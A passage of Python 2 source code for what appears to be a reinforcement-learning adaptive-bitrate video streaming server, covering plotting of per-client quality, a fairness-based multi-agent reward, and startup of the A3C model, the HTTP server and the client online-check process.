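# hosts from the previous one, updateQue() sets QueOL to ['10.0.0.2', '10.0.0.3'],
# copies Que1_ into Que2_ and clears Que1_, so a client stays "online" for up to
# two check intervals after its last heartbeat.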
##########################


########## plot ##########
def plot(Dictt, Dictq):
    color_ = ['black', 'red', 'blue', 'green', 'gold', 'm']
    c = 0
    for k in Dictt.keys():
        plt.plot(Dictt[k], Dictq[k], color=color_[c % 6])
        #print(Dictt[k], Dictq[k])
        plt.scatter(Dictt[k], Dictq[k], color=color_[c % 6])
        plt.title("RL_1")
        plt.axis([-1, max(Dictt[k]) * 1.1, 0, 6])
        c = c + 1
    plt.pause(1)
##########################


### multi agent reward ###
def multi_agent_reward(Dictq):
    # VIDEO_BIT_RATE
    total_reward = 0
    miu = 0
    sigma = 0
    lastQ = []
    for k in Dictq.keys():
        lastQ.append((Dictq[k])[-1])
    miu = np.mean(lastQ)
    sigma = np.std(lastQ)
    total_reward = miu - sigma
    return total_reward
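# Illustrative example (not part of the original code): if three clients last
# played qualities [4, 4, 1], then miu = 3.0 and sigma ~= 1.41, so the
# multi-agent reward is ~1.59; the standard-deviation term penalizes
# unfairness between concurrently streaming clients.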
##########################
def run(server_class=HTTPServer, port=8334, log_file_path=LOG_FILE):
    np.random.seed(RANDOM_SEED)
    assert len(VIDEO_BIT_RATE) == A_DIM

    if not os.path.exists(SUMMARY_DIR):
        os.makedirs(SUMMARY_DIR)

    with tf.Session() as sess, open(log_file_path, 'wb') as log_file:
        actor = a3c.ActorNetwork(sess,
                                 state_dim=[S_INFO, S_LEN], action_dim=A_DIM,
                                 learning_rate=ACTOR_LR_RATE)
        critic = a3c.CriticNetwork(sess,
                                   state_dim=[S_INFO, S_LEN],
                                   learning_rate=CRITIC_LR_RATE)

        sess.run(tf.initialize_all_variables())
        saver = tf.train.Saver()  # save neural net parameters

        # restore neural net parameters
        nn_model = NN_MODEL
        if nn_model is not None:  # nn_model is the path to the checkpoint file
            saver.restore(sess, nn_model)
            print("Model restored.")

        init_action = np.zeros(A_DIM)
        init_action[DEFAULT_QUALITY] = 1

        s_batch = [np.zeros((S_INFO, S_LEN))]
        a_batch = [init_action]
        r_batch = []

        train_counter = 0

        last_bit_rate = DEFAULT_QUALITY
        last_total_rebuf = 0
        # need this storage, because the observation only contains the total rebuffering time;
        # we compute the difference to get the per-chunk rebuffering time
        video_chunk_count = 0

        input_dict = {'sess': sess, 'log_file': log_file,
                      'actor': actor, 'critic': critic,
                      'saver': saver, 'train_counter': train_counter,
                      'last_bit_rate': last_bit_rate,
                      'last_total_rebuf': last_total_rebuf,
                      'video_chunk_count': video_chunk_count,
                      's_batch': s_batch, 'a_batch': a_batch, 'r_batch': r_batch}

        # interface to abr_rl server
        handler_class = make_request_handler(input_dict=input_dict)

        server_address = ('', port)
        #httpd = server_class(server_address, handler_class)
        httpd = my_socketserver(server_address, handler_class)
        print 'Listening on port ' + str(port)

        ####### onlineCheck ######
        global Que1
        global Que2
        global QueOnline
        p = multiprocessing.Process(target=onlineCheck, args=(Que1, Que2, QueOnline))
        p.daemon = True  # set before start() so the checker exits with the main process
        p.start()
        ##########################

        httpd.serve_forever()
def main():
    if len(sys.argv) == 2:
        trace_file = sys.argv[1]
        run(log_file_path=LOG_FILE + '_RL_' + trace_file)
    else:
        run()


if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        print "Keyboard interrupted."
        try:
            sys.exit(0)
        except SystemExit:
            os._exit(0)